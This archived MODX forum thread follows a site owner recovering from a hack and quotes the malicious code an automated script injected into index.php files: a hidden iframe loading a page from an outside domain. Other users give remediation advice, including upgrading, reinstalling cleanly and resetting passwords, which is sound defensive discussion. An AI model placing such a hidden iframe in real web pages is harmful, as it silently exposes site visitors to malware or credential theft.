We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

Index.php file has been changed - iframe injection

    • 37210
    • 131 Posts
    insightdesign Reply #1, 10 years, 5 months ago
    Hi all,

    One of our sites has unfortunately been hacked. The manager/index.php file was altered on the 16/11/13. The Front End is still up and running from what I can see.

    Our client couldn't access the manager. So I checked the manager/index.php file and saw the following code at the very end of the file:
    <iframe src="http://affiliatesstats.com/in.cgi?4" width="10" height="10" style="visibility:hidden;position:absolute;left:0;  top:0;"></iframe>


    I deleted that code, and I thought that would be it, but unfortunately, the manager is only a quarter of the way working. See attached screenshot.


    • None of the buttons in the manager are working
    • The file permission for manager/index.php is 644. Is that right?
    • From what I can see, no other files have been touched - although a lot of them have the same modified date of 16/11/13. Only the manager/index.php file.
    • MODX Version: Revolution 2.1.3-pl (traditional)

    Anybody else see something obvious I can do?

    Regards,
    Sar [ed. note: insightdesign last edited this post 10 years, 5 months ago.]
    • sottwell Reply #2, 10 years, 5 months ago
      I would upgrade. Actually delete the entire manager directory and replace it with the new one. Make sure any file that shows the recent modification date is removed and replaced. Make sure your core/config/config.inc.php file is clean, as well as the three config.core.php files (root, manager and connectors).

      If this is on shared or otherwise managed hosting, talk to your tech support. They possibly got into your site with the Manager user's password restore bug, which was fixed a few versions ago. Sign up for the security feed or newsletter and keep your sites updated. Or possibly the entire server was compromised, in which case you won't be the only one hosted on that server with problems.

        Studying MODX in the desert - http://sottwell.com
        Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
        Join the Slack Community - http://modx.org
        • 37210
        • 131 Posts
        insightdesign Reply #3, 10 years, 5 months ago
        Quote from: sottwell at Nov 20, 2013, 04:58 AM
        I would upgrade. Actually delete the entire manager directory and replace it with the new one. Make sure any file that shows the recent modification date is removed and replaced. Make sure your core/config/config.inc.php file is clean, as well as the three config.core.php files (root, manager and connectors).

        If this is on shared or otherwise managed hosting, talk to your tech support. They possibly got into your site with the Manager user's password restore bug, which was fixed a few versions ago. Sign up for the security feed or newsletter and keep your sites updated. Or possibly the entire server was compromised, in which case you won't be the only one hosted on that server with problems.


        We will strongly suggest to the client that they upgrade.

        I went into the connectors/index.php file (I missed that one in my earlier search) and deleted the injected code and now the menu on the left hand side comes up (see screenshot) but none of the information comes up EXCEPT for the files.

        So, anyway, what do you think the hackers are expecting to get out of this? Are they assuming the index file is an HTML file? Because obviously the index.php file stop working coz of the random <iframe> code.
        • sottwell Reply #4, 10 years, 5 months ago
          Usually putting iframes into index.whatever files will cause the page to have the iframe when viewed. These are usually linked to malicious sites, or spam-links sites. The oddity of infecting the manager and connector index.php files could be explained by this being some kind of automated script, just looking for index.whatever files. That is why I'd be suspicious of some script actually having been uploaded to the server, in which case it'll just do it again.
            Studying MODX in the desert - http://sottwell.com
            Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
            Join the Slack Community - http://modx.org
            • 38705
            • 101 Posts
            mintnl Reply #5, 10 years, 5 months ago
            As Sottwell suggest a upgrade would be number 1. There have been quite some new releases since then, also regarding security issues.
            Regarding your question
            So, anyway, what do you think the hackers are expecting to get out of this?
            It's quite simple, the iframe somehow contains malicious software that will attack the browser of the visitor. Or maybe a keylogger which will get all te keystrokes you, or your users, make while logging in.

            The way you describe the problem looks like a scanner injecting all index.php files. That points to a complete compromise of your account, or maybe even complete server (if shared).

            It might be me, but I wouldn't trust anything anymore. If the site is of reasonable size I would opt for complete reinstall.
            Just create a new install on, for instance, a test domain. and recreate the site with only the newest release & packages.
            Then copy content, images, javascript & css to new site. If all's running well again replace the "old" site with the updated one completely.
            Also change ALL passes granted to users, moderators, ftp, sql, accountpanel etc...
            That way you have a clean install again.

            Just my 2 cents...
            Good luck!
              Addict since 2012....
              • 37210
              • 131 Posts
              insightdesign Reply #6, 10 years, 5 months ago
              Quote from: sottwell at Nov 20, 2013, 08:45 AM
              Usually putting iframes into index.whatever files will cause the page to have the iframe when viewed. These are usually linked to malicious sites, or spam-links sites. The oddity of infecting the manager and connector index.php files could be explained by this being some kind of automated script, just looking for index.whatever files. That is why I'd be suspicious of some script actually having been uploaded to the server, in which case it'll just do it again.

              Yeah. The bot injected that iframe into every single index.php file. I even had a couple dormant/offline MODx folders on the server affected.

              Quote from: mintnl at Nov 20, 2013, 03:01 PM
              As Sottwell suggest a upgrade would be number 1. There have been quite some new releases since then, also regarding security issues.
              Regarding your question
              So, anyway, what do you think the hackers are expecting to get out of this?
              It's quite simple, the iframe somehow contains malicious software that will attack the browser of the visitor. Or maybe a keylogger which will get all te keystrokes you, or your users, make while logging in.

              The way you describe the problem looks like a scanner injecting all index.php files. That points to a complete compromise of your account, or maybe even complete server (if shared).

              It might be me, but I wouldn't trust anything anymore. If the site is of reasonable size I would opt for complete reinstall.
              Just create a new install on, for instance, a test domain. and recreate the site with only the newest release & packages.
              Then copy content, images, javascript & css to new site. If all's running well again replace the "old" site with the updated one completely.
              Also change ALL passes granted to users, moderators, ftp, sql, accountpanel etc...
              That way you have a clean install again.

              Just my 2 cents...
              Good luck!

              I don't think the server has been infected since our two other sites on the same server are okay. I most certainly will suggest an upgrade for all of our clients. Thanks for your two cents!

              Sar